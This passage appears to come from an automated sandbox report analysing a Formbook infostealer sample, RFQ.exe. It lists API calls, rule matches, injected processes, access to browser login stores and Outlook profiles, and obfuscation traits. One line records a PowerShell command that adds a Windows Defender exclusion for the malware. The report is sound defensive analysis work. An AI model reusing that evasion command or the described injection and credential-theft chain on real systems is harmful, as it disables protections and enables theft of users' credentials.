            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72CC0 NtQueryVirtualMemory,5_2_01A72CC0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72C00 NtQueryInformationProcess,5_2_01A72C00
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72C60 NtCreateKey,5_2_01A72C60
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72FA0 NtQuerySection,5_2_01A72FA0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72FB0 NtResumeThread,5_2_01A72FB0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72F90 NtProtectVirtualMemory,5_2_01A72F90
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72FE0 NtCreateFile,5_2_01A72FE0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72F30 NtCreateSection,5_2_01A72F30
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72F60 NtCreateProcessEx,5_2_01A72F60
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72EA0 NtAdjustPrivilegesToken,5_2_01A72EA0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72E80 NtReadVirtualMemory,5_2_01A72E80
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72EE0 NtQueueApcThread,5_2_01A72EE0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A72E30 NtWriteVirtualMemory,5_2_01A72E30
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A73090 NtSetValueKey,5_2_01A73090
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A73010 NtOpenDirectoryObject,5_2_01A73010
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A739B0 NtGetContextThread,5_2_01A739B0
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A73D10 NtOpenProcessToken,5_2_01A73D10
            Source: C:\Users\user\Desktop\RFQ.exe, Code function: 5_2_01A73D70 NtOpenThread,5_2_01A73D70
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03924340 NtSetContextThread,LdrInitializeThunk,8_2_03924340
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03924650 NtSuspendThread,LdrInitializeThunk,8_2_03924650
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03922BA0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03922BF0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03922BE0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922B60 NtClose,LdrInitializeThunk,8_2_03922B60
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922AD0 NtReadFile,LdrInitializeThunk,8_2_03922AD0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922AF0 NtWriteFile,LdrInitializeThunk,8_2_03922AF0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922FB0 NtResumeThread,LdrInitializeThunk,8_2_03922FB0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922FE0 NtCreateFile,LdrInitializeThunk,8_2_03922FE0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922F30 NtCreateSection,LdrInitializeThunk,8_2_03922F30
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03922E80
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03922EE0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922DD0 NtDelayExecution,LdrInitializeThunk,8_2_03922DD0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03922DF0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03922D10
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03922D30
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03922CA0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03922C70
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922C60 NtCreateKey,LdrInitializeThunk,8_2_03922C60
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_039235C0 NtCreateMutant,LdrInitializeThunk,8_2_039235C0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_039239B0 NtGetContextThread,LdrInitializeThunk,8_2_039239B0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922B80 NtQueryInformationFile,8_2_03922B80
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922AB0 NtWaitForSingleObject,8_2_03922AB0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922F90 NtProtectVirtualMemory,8_2_03922F90
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922FA0 NtQuerySection,8_2_03922FA0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922F60 NtCreateProcessEx,8_2_03922F60
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922EA0 NtAdjustPrivilegesToken,8_2_03922EA0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922E30 NtWriteVirtualMemory,8_2_03922E30
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922DB0 NtEnumerateKey,8_2_03922DB0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922D00 NtSetInformationFile,8_2_03922D00
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922CC0 NtQueryVirtualMemory,8_2_03922CC0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922CF0 NtOpenProcess,8_2_03922CF0
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03922C00 NtQueryInformationProcess,8_2_03922C00
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03923090 NtSetValueKey,8_2_03923090
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03923010 NtOpenDirectoryObject,8_2_03923010
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03923D10 NtOpenProcessToken,8_2_03923D10
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_03923D70 NtOpenThread,8_2_03923D70
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_030E7310 NtClose,8_2_030E7310
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_030E7270 NtDeleteFile,8_2_030E7270
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_030E7180 NtReadFile,8_2_030E7180
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_030E7020 NtCreateFile,8_2_030E7020
            Source: C:\Windows\SysWOW64\icacls.exe, Code function: 8_2_030E7460 NtAllocateVirtualMemory,8_2_030E7460
            Source: RFQ.exe, 00000000.00000002.2018583562.00000000093A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ.exe
            Source: RFQ.exe, 00000000.00000002.2006725572.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs RFQ.exe
            Source: RFQ.exe, 00000000.00000002.2013468785.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs RFQ.exe
            Source: RFQ.exe, 00000000.00000002.2017154668.00000000073C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs RFQ.exe
            Source: RFQ.exe, 00000000.00000002.2009924751.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs RFQ.exe
            Source: RFQ.exe, 00000000.00000000.1973725602.0000000000812000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameeFri.exe: vs RFQ.exe
            Source: RFQ.exe, 00000005.00000002.2157658184.0000000001B2D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
            Source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameiCACLS.EXEj% vs RFQ.exe
            Source: RFQ.exe Binary or memory string: OriginalFilenameeFri.exe: vs RFQ.exe
            Source: RFQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: RFQ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFePlkmXblX4RY1BsP.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.cs Security API names: _0020.SetAccessControl
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.cs Security API names: _0020.AddAccessRule
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFePlkmXblX4RY1BsP.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.cs Security API names: _0020.SetAccessControl
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.cs Security API names: _0020.AddAccessRule
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/7@24/10
            Source: C:\Users\user\Desktop\RFQ.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\RFQ.exe Mutant created: \Sessions\1\BaseNamedObjects\lslPeCbAktBspLhnUESkV
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyrwqexs.umm.ps1
            Source: RFQ.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\RFQ.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\RFQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: icacls.exe, 00000008.00000003.2333632738.0000000003316000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2333526865.00000000032F5000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4431220100.0000000003321000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4431220100.0000000003316000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4431220100.0000000003343000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: RFQ.exe Virustotal: Detection: 29%
            Source: RFQ.exe ReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\RFQ.exe File read: C:\Users\user\Desktop\RFQ.exe:Zone.Identifier
            Source: unknown Process created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Users\user\Desktop\RFQ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\RFQ.exe Process created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
            Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\RFQ.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, textshaping.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
            Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Users\user\Desktop\RFQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\RFQ.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\icacls.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: RFQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: RFQ.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: icacls.pdb source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000002.4431445445.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431314458.00000000008FE000.00000002.00000001.01000000.0000000D.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431191705.00000000008FE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2157292356.0000000003553000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2159010272.0000000003709000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: icacls.pdbGCTL source: RFQ.exe, 00000005.00000002.2157289762.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000002.4431445445.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ.exe, RFQ.exe, 00000005.00000002.2157658184.0000000001A00000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, icacls.exe, 00000008.00000003.2157292356.0000000003553000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000003.2159010272.0000000003709000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp, icacls.exe, 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.RFQ.exe.93a0000.14.raw.unpack, oFwJa0tHHWnjMMhMVc.cs .Net Code: ufQDpZk6jv System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ.exe.3fd2d00.9.raw.unpack, oFwJa0tHHWnjMMhMVc.cs .Net Code: ufQDpZk6jv System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ.exe.2c801f4.7.raw.unpack, SQL.cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.RFQ.exe.73c0000.10.raw.unpack, SQL.cs .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 0_2_077BB3BF push ecx; ret 0_2_077BB3C4
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_00417948 push edi; retf 5_2_00417956
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_0041C155 push edx; iretd 5_2_0041C156
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_00417904 push edi; retf 5_2_00417956
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_0041E2FB push B2CD0983h; ret 5_2_0041E301
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_0040CBF6 push eax; ret 5_2_0040CBF7
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_00403397 push ebx; retf 5_2_00403398
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_0040CB98 push ecx; iretd 5_2_0040CBDC
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_0040857A push eax; ret 5_2_00408585
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_00415DA1 push eax; iretd 5_2_00415DA3
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_00403730 push eax; ret 5_2_00403732
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_01A0225F pushad ; ret 5_2_01A027F9
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_01A027FA pushad ; ret 5_2_01A027F9
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_01A309AD push ecx; mov dword ptr [esp], ecx 5_2_01A309B6
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_01A0283D push eax; iretd 5_2_01A02858
            Source: C:\Users\user\Desktop\RFQ.exe Code function: 5_2_01A01366 push eax; iretd 5_2_01A01369
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_038B225F pushad ; ret 8_2_038B27F9
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_038B27FA pushad ; ret 8_2_038B27F9
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_038E09AD push ecx; mov dword ptr [esp], ecx 8_2_038E09B6
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_038B283D push eax; iretd 8_2_038B2858
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_038B1368 push eax; iretd 8_2_038B1369
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_030D4215 push edi; retf 8_2_030D4223
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_030D41D1 push edi; retf 8_2_030D4223
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_030D266E push eax; iretd 8_2_030D2670
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_030DABC8 push B2CD0983h; ret 8_2_030DABCE
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_030D8A22 push edx; iretd 8_2_030D8A23
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_030DEE37 push FFFFFFE1h; iretd 8_2_030DEE3D
            Source: C:\Windows\SysWOW64\icacls.exe Code function: 8_2_030C4E47 push eax; ret 8_2_030C4E52
            Source: RFQ.exe Static PE information: section name: .text entropy: 7.793030920225636

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
            Source: C:\Users\user\Desktop\RFQ.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\icacls.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

